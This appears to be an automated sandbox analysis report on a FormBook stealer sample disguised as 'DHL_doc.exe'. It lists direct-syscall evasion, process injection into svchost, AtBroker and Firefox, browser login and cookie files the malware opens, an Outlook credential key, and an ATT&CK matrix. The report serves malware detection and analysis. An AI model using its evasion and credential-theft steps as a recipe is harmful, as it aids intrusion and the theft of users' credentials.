Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]	1_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]	1_2_031649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_031FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]	1_2_031C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]	1_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]	1_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_031BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]	1_2_031BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]	1_2_0316A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]	1_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]	1_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]	1_2_03160854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134859 mov eax, dword ptr fs:[00000030h]	1_2_03134859

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F20B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00F20B62

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EF2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EF2622
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EE083F
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE09D5 SetUnhandledExceptionFilter,	0_2_00EE09D5
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00EE0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EE0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL_doc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\AtBroker.exe

Thread register set: target process: 7780

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\AtBroker.exe

Thread APC queued: target process: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL_doc.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 5D1008

Jump to behavior

Source: C:\Users\user\Desktop\DHL_doc.exe

0_2_00F21201

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F02BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F02BA5

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F2B226 SendInput,keybd_event,

0_2_00F2B226

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00F422DA

Source: C:\Users\user\Desktop\DHL_doc.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_doc.exe"	Jump to behavior
Source: C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL_doc.exe

0_2_00F20B62

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F21663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00F21663

Source: DHL_doc.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DHL_doc.exe, hubOySeXSAbhw.exe, 00000003.00000002.3565545903.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000000.1873875247.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065822515.0000000001651000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: hubOySeXSAbhw.exe, 00000003.00000002.3565545903.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000000.1873875247.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065822515.0000000001651000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: hubOySeXSAbhw.exe, 00000003.00000002.3565545903.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000000.1873875247.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065822515.0000000001651000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: hubOySeXSAbhw.exe, 00000003.00000002.3565545903.00000000014A0000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000003.00000000.1873875247.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000000.2065822515.0000000001651000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EE0698 cpuid

0_2_00EE0698

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F38195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00F38195

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00F1D27A GetUserNameW,

0_2_00F1D27A

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EFBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00EFBB6F

Source: C:\Users\user\Desktop\DHL_doc.exe

Code function: 0_2_00EC42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00EC42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3567573313.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566004775.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566049277.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3564847310.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958580078.00000000071C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951242862.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951751697.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3565909815.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\AtBroker.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: DHL_doc.exe	Binary or memory string: WIN_81
Source: DHL_doc.exe	Binary or memory string: WIN_XP
Source: DHL_doc.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: DHL_doc.exe	Binary or memory string: WIN_XPe
Source: DHL_doc.exe	Binary or memory string: WIN_VISTA
Source: DHL_doc.exe	Binary or memory string: WIN_7
Source: DHL_doc.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3567573313.0000000005450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566004775.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3566049277.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3564847310.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958580078.00000000071C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951242862.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1951751697.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3565909815.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F41204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00F41204
Source: C:\Users\user\Desktop\DHL_doc.exe	Code function: 0_2_00F41806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00F41806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL_doc.exe	37%	ReversingLabs	Win32.Trojan.AutoitInject
DHL_doc.exe	30%	Virustotal		Browse
DHL_doc.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
